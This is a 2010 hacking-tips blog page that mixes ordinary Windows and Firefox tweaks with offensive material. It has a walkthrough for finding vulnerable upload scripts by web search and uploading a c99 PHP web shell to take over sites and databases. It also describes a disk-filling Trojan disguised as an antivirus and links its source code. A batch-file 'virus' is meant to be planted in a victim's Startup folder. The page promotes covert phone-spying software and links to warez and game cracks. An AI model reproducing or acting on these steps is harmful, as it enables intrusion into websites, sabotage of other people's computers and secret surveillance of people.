Sunday, December 19, 2010
How to make your Desktop Icons Transparent
How To Change windows xp boot screen[EASY WAY]
Stardock BootSkin is a program that allows users to change their Windows XP boot screens.
Unlike other programs that can change the Windows XP boot screens, BootSkin does so in a safe manner. It doesn’t patch the Windows XP kernel. Nor does it require the user to download replacement Windows XP kernels to do so.
Boot screens that use BootSkin are typically under 20K compared to other boot screen programs whose files are over 2 MEGABYTES.
See dis for more details
http://www.stardock.com/products/bootskin/
HOW TO SPEED UP FIREFOX
*Open Firefox, and type about:config in the address bar. Don’t worry about the warning that comes out.
*Use the filter above to find network.http.pipelining and set it to True by double clicking on it.
*Create a new boolean value named network.http.pipelining.firstrequest and set that to True, as we
*Find network.http.pipelining.maxrequests, double click on it, and change its value to 8.
*Now look for network.http.proxy.pipelining and again set it to True.
*Create two new integers named nglayout.initialpaint.delay and content.notify.interval, setting them to 0.
*Now restart your browser and check a few heavy-loading websites to see if those changes worked or not...
IT WORKED GR8 for me
Send SMS Text Messages from Your Computer to Any Mobile Phone !
With Microsoft Outlook 2007, you can easily send (or receive) SMS text messages from computer to any mobile phone – just write a new SMS text message (like the way you compose emails in Outlook) and hit Send.
Similarly, you can also forward emails, pending tasks and calendar items from Outlook to your mobile phone via SMS.
How to send SMS text messages from computer using Outlook 2007 ?
To SMS enable your copy of Microsoft Outlook 2007, first register your mobile phone number at SMSOfficer. This new service from Microsoft supports almost all cellular operators in US and other international countries including India
.
You will soon get an SMS verification code on your mobile phone, confirm and the SMS feature is activated in your Outlook without you having to download any additional software – you will need to click on a configuration link which sets the entire configuration for you.
To compose an SMS message in Outlook, select New -> Text Message. Outlook is automatically set up to use the standard text message limit of 160 characters. If your message exceeds the 160 character limit, the extra characters are truncated and delivered as a separate text message.
There are no registration charges and you also get 10 SMS credits for free at the time of joining SMS Officer. Once you exhaust the free limit, you need to pay for using the Outlook SMS service – payment can be made via PayPal.
When the other person replies to your SMS message, it will arrive in your mobile phone. Am not sure if you can use Outlook 2007 to send bulk SMS messages – i.e., one SMS message addressed to multiple recipeints.
How to Format Your PC
(Formatting a PC is to delete all the data that currently is on your Computer and upgrade it to a newer version of an operating system or install the same operating system once again on the same computer.)
A virus has intruded in your PC or you want to upgrade from your older versions of Windows, you will have to format your PC. Formatting your PC can sometimes be a very tough process if you do not have the proper knowledge.
There are many benefits of formatting such as: Faster Computer No Virus etc.
But there are some disadvantages too: You lose all your data You have to install all your favourite software once again.
Now, lets start the process of formatting a PC.
First of all, you will need a bootable disk of WINDOWS XP to boot your computer from the disk. Warning -- Please backup all your data before you format your PC.
The process of formatting is as follows:
1. Insert the WINDOWS XP bootable disk in the CD drive.
2. Restart your PC (if it was already running).
3. Press enter when the monitor reads PRESS ANY KEY.
4. Now comes the time to partition your drives.
5. If you want to delete any partition, press D or L(whichever is displayed on the screen).
6. Afterwards format the drive you want to install the operating system (XP) in.
7. Press ENTER.
8. The formatting will start.
9. Follow the procedures. 10.It should take around 40 minutes for the installation to finish. 11.Use windows(HAVE A GOOD TIME).
Learn Phishing guide
What are Phisher ?
and many many more.
Create files with no name
How to play games without cd.
*Download no cd crack of your respective game
*copy .exe file from the downloaded file
Saturday, December 18, 2010
How to Operate Mouse Pointer Without Mouse (Magic)
7 8 94 61 2 3
How to Make a Trojan Horse
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…
Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
Now lets move to the working of our Trojan
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll”
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.
Copy or Move Files Faster
With TeraCopy Pro 1.22 you can--
- Copy files faster. TeraCopy uses dynamically adjusted buffers to reduce seek times. Asynchronous copy speeds up file transfer between two physical hard drives.
- Pause and resume file transfers. Pause copy process at any time to free up system resources and continue with a single click.
- Error recovery. In case of copy error, TeraCopy will try several times and in the worse case just skips the file, not terminating the entire transfer.
- Interactive file list. TeraCopy shows failed file transfers and lets you fix the problem and recopy only problem files.
- Shell integration. TeraCopy can completely replace Explorer copy and move functions, allowing you work with files as usual.
- 64-bit OS support. Shell integration works in both 32-bit and 64-bit versions of XP
Download
Password- www.thewarezworld.com
Spy on Any Cell Phone
Spy Phone GOLD – The #1 Cell Phone Spy Software
Download Spy Phone GOLD software directly onto your mobile phone and receive copies of SMS, Call Logs, Emails, Locations and also listen to live conversations on the target cell phone within minutes. Spy Phone GOLD is the best Cell Phone Spy software of it’s kind. Beware of counterfeit spy softwares on the market, buy original and genuine cell phone spy software from SpyEra.- Call Interception – Listen to the actual calls LIVE on the target cell phone
- Environment Listening – Make a spy call to the target phone running SPY PHONE and listen in to the phone’s surroundings.
- SMS Logging – Records both incoming & outgoing SMS
- SIM Change Notification – Get instant notification via SMS when the target cell phone changes it’s SIM
- Remote Control – Send secret SMS to the target phone to control all functions
- Spy from any location accross the world
- 100% Undetectable
The working of Spy Phone GOLD is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Spy Phone GOLD, you can directly download the spy software onto the target cell phone and installation takes only a few minutes (Approx. 10 Min). No More physical access to the cell phone is required after installation!
Step 2- After installation, SPY Phone secretly records events that happen on the target phone and delivers this information to a web account, where you can view these reports 24×7 from any Internet enabled computer or mobile phone.
Spy Phone is fully compatible with the following mobile phones
- BlackBerry Phones
- Android Phones
- Apple iPhones
- Windows Mobile Phones
- Symbian OS 9.x and 8.x phones
Spy on Any Cell Phone
Spy Phone GOLD – The #1 Cell Phone Spy Software
Download Spy Phone GOLD software directly onto your mobile phone and receive copies of SMS, Call Logs, Emails, Locations and also listen to live conversations on the target cell phone within minutes. Spy Phone GOLD is the best Cell Phone Spy software of it’s kind. Beware of counterfeit spy softwares on the market, buy original and genuine cell phone spy software from SpyEra.- Call Interception – Listen to the actual calls LIVE on the target cell phone
- Environment Listening – Make a spy call to the target phone running SPY PHONE and listen in to the phone’s surroundings.
- SMS Logging – Records both incoming & outgoing SMS
- SIM Change Notification – Get instant notification via SMS when the target cell phone changes it’s SIM
- Remote Control – Send secret SMS to the target phone to control all functions
- Spy from any location accross the world
- 100% Undetectable
The working of Spy Phone GOLD is very simple and needs no extra knowledge to install and use.
Step 1- After you purchase Spy Phone GOLD, you can directly download the spy software onto the target cell phone and installation takes only a few minutes (Approx. 10 Min). No More physical access to the cell phone is required after installation!
Step 2- After installation, SPY Phone secretly records events that happen on the target phone and delivers this information to a web account, where you can view these reports 24×7 from any Internet enabled computer or mobile phone.
Spy Phone is fully compatible with the following mobile phones
- BlackBerry Phones
- Android Phones
- Apple iPhones
- Windows Mobile Phones
- Symbian OS 9.x and 8.x phones
How to Find the IP Address of a Remote Computer
Thursday, December 2, 2010
Earn more money
I have something interesting for you - you can easily earn regular income online via PaisaPay.in!
It’s really amazing! You get paid to open & read the contents of PaisaPay mails. You also receive special discount coupons, promotions and free passes to various events in your city.
Join now and get Rs. 99 instantly, just for joining. What more, as a special bonus you get paid for inviting your friends also!
Create your PaisaPay Account & refer your friends to earn launch referral bonus on every new registration.
Saturday, October 23, 2010
How to Make Invisible Password Protected Folder
Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.
How to create a Password Protected Folder
Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.
Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.
Step-3: Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.
Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.
Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.
Step-6: Now goto the File menu and select the option Add a password.
ie: File -> Add a password
Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.
How to make it Invisible
Step-1: Now Right-click on this password protected folder and select Properties.
Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).
Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options
- Do not show hidden files and folders
- Show hidden files and folders
Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password.
To make it invisible again repeat step -1 through
step-3 and select the first option and click OK. Now the folder becomes invisible once again.
I hope you like this post. Pass your comments!! Cheers
HOW TO HACK WEBSITE
quote and you will have list of sites which is using this script.
I got site now how can I know site is vulnerable or not?
Wait I will explain in next step..
In google or yahoo type "Only zip and rar files can be uploaded" with
quote and you will have list of sites which is using this script.
I got site now how can I know site is vulnerable or not?
Wait I will explain in next step..
OK got site now?
Download this file and upload on server.
CODE
http://rapidshare.com/files/73941222/HACK.rar
Extract it .. you will get a file name india.php.rar
(Remember, Don't change extension)
This is your Exploit shell script
Now upload the file india.php.rar to the site you found to hack :mrgreen:
After uploading file. Get link to download file and download that file.
After few seconds you will see download file button and click on it, If
you are seeing Download Box to download file than leave that site
because that site is not vulnerable and try other site.
If you are seeing message like "OK file copy in victim host, open
india.php" then it means SHELL copied on server, now just remove
india.php.rar from your address bar and open only india.php like if you
have opened
CODE
http://www.cooldownload.org/audio/au.../india.php.rar
then open
CODE
http://www.cooldownload.org/audio/au...7f82/india.php
and you can see c99 shell there
Now site is in your hands edit its index.php ... Hack its sql database whatever you wish you can do ...
Tuesday, October 12, 2010
virus creator
Right, now im gonna teach you how to make a prank virus, which shutdowns your victims computer.
1. Start with choosing: Start> Run.
2. When you have opened Run type the following: notepad.
3. Right, so now you have opened notepad. Now type(in notepad): @each off.
4. Now press enter and type: shutdown -s -t 240 -c "Here you can write a comment"
Ok, when you write your comment dont forget these " "
Ok, now that you have written that choose "Save As" and name it Virus.bat
So that is it.. thats the virus, and the virus is set at 4min before it is activated.
And if you neseserely want to click at the virus just to test it, I will show you how to stop the virus while activated.
Right, to do this: Follow step 1-3, and when you have pressed enter: type: shutdown -a.
Now save this file as: Virus stopper.bat
if u want to do something more ..like fomat friend system.follow these steps:
step 1) select that .bat file (like drag but but when u'll click to mouse dont leave till finishing all steps).
step 2)goto stat---->All Programs-->startup---->put here ur .bat file here.